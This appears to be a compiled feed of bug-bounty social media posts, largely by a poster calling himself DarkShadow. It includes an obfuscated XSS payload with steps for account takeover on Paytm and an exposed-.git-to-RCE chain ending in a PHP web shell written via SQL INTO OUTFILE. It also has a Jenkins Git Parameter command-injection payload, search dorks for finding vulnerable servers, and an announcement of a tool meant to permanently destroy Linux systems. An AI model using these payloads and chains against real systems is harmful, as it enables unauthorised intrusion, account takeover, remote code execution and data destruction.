Bug Hunters Methodology v4
@Jason Haddix

CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 rating❗️

Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.

Search at Netlas.io:
👉 Link: https://nt.ls/puxoz
👉 Dork: http.body:"plugins/searchpro"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload

Hey Hunter's,
DarkShadow here back again!

SubClick One-click Subdomain Finder Bookmark template.

This is my private tool that I use during bug hunting.
If you guys like it, I’ll publish it on my GitHub.
I’ve uploaded a sample video demo — let me know what you think!

🧠 Features
✅ One-click execution – just add to bookmarks and click
✅ No setup required – works as a browser bookmarklet
✅ Fast subdomain discovery from multiple public sources
✅ Subdomain live check (best-effort, despite CORS/CSP)
✅ Download results as .txt directly from the browser
✅ Displays subdomains as clickable links with basic status
✅ Fully client-side – no server or data collection involved
✅ Bug bounty friendly – made for recon & live target scanning

#bugbountytips #infosec

Hey Hunter's,
DarkShadow here back again dropping my own private tool now!

SubClick is now available in my GitHub repo.

Collect subdomains in just one click! Bookmark – visit target – click – done ✅

https://github.com/darkshadow2bd/SubClick

✨If it is helpful give a ⭐ in GitHub

#bugbountytips #infosec

Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!

👀Step to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!


✅Payload:

<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>

Cradit ~ @TEAM_DH049

#bugbountytips #xss

Hey Hunter's,
DarkShadow here  back again, dropping one of my secret methodologies that turns a full Remote Code Execution!


💥 From /.git to FULL RCE – The Ultimate Git-Based Exploitation Chain🔥

🎯 Target: Exposed .git/ Directory

You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again — we’re about to break that into Critical RCE 🔥

🔍 Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.

⚙️ Step-by-Step Exploitation
Step 1: Dump the Git Repo

Use GitDumper from GitTools:

git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode

👉 This tool will recursively download the entire .git repository into /webCode

Step 2: Reconstruct the Source Code

cd webCode
git checkout .

✅ This restores all files from the latest commit, giving you full access to the source code.

Step 3: Explore Git History for Secrets

git log -p

Look for hardcoded credentials, tokens, DB configs, etc.

📌 Realistic Example:

commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date:   Thu Jul 11 17:32:15 2024 +0000

    Added database config

diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>

We’ve got database password!

Step 4: Connect to the Database

mysql -h 258.20.78.55 -u root -p'master_!pass2020'

Step 5: Escalate to RCE via SQL

Check your privileges:

SHOW GRANTS FOR CURRENT_USER;

✅ If You Have FILE Privilege:

Write a web shell to the web root:

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Then browse:

https://target.com/shell.php?cmd=id

Boom 💥 — Remote Code Execution on the box!

If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X 👉🏼 x.com/darkshadow2bd

#bugbountytips

Is there Anyone from uwo.ca
western University

Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! 🤠

🔗 github.com/musana/fuzzuli

Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...

🔥Jenkins Git Parameter Plugin – Command Injection💀

The Jenkins plugin “Git Parameter” (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.

Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.

POC payload:

set parameter type: branch
Input the Payload in, set default value: $(sleep 80)

insert here $(YOUR OS COMMANDS)

So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow

#bugbountytips #poc #Infosec #rce

Guy's finally i made Linuxbomber.

A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.

Let me know can i upload the tool in my GitHub?

Made just for educational purpose only

🚨 CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability

🔥PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis

👇Dorks
HUNTER : https://product.name="Jenkins"

📰Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419

https://github.com/advisories/GHSA-qcj2-99cg-mppf